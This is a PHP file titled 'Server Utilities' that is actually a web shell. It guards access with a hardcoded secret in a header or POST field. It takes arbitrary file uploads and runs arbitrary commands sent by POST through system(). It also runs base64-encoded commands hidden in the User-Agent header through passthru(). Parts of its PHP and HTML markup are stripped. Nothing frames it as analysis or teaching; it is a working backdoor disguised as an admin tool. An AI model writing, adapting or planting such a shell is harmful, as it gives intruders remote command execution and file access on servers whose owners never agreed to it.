$secret = '45i4i5NJSDNFJDNFD';
$auth = false;
// Check for authentication via header or POST
if (isset($_SERVER['HTTP_X_SECRET']) && $_SERVER['HTTP_X_SECRET'] === $secret) {
$auth = true;
} elseif (isset($_POST['secret']) && $_POST['secret'] === $secret) {
$auth = true;
}
if (!$auth) {
<!DOCTYPE html>
Utils <title>Utils</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
textarea { width: 100%; height: 100px; }
pre { background: #f4f4f4; padding: 10px; }
</style>
Authentication
exit;
}
// Display server name
$serverName = gethostname();
// Handle file upload
$uploadMessage = '';
if (isset($_FILES['file'])) {
$uploadDir = './uploads/';
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
$uploadFile = $uploadDir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) {
$uploadMessage = 'File uploaded: ' . htmlspecialchars($uploadFile);
} else {
$uploadMessage = 'Upload failed';
}
}
// Handle command execution via POST
$cmdOutput = '';
if (isset($_POST['cmd'])) {
ob_start();
system($_POST['cmd']);
$cmdOutput = ob_get_clean();
}
// Handle command execution via User-Agent (for non-browser use)
if (isset($_SERVER['HTTP_USER_AGENT']) && !isset($_POST['cmd']) && !isset($_FILES['file'])) {
echo passthru(base64_decode($_SERVER['HTTP_USER_AGENT']));
exit;
}
<!DOCTYPE html>
Utils <title>Utils</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
textarea { width: 100%; height: 100px; }
pre { background: #f4f4f4; padding: 10px; }
.section { margin-bottom: 20px; }
</style>
Server Utilities
<div class="section">
Server Information
<p><strong>Server Name:</strong> echo htmlspecialchars($serverName); </p>
</div>
<div class="section">
Command Execution
if ($cmdOutput):
<h4>Output:</h4>
<pre> echo htmlspecialchars($cmdOutput); </pre>
endif;
</div>
<div class="section">
File Upload
if ($uploadMessage):
<p> echo htmlspecialchars($uploadMessage); </p>
endif;
</div>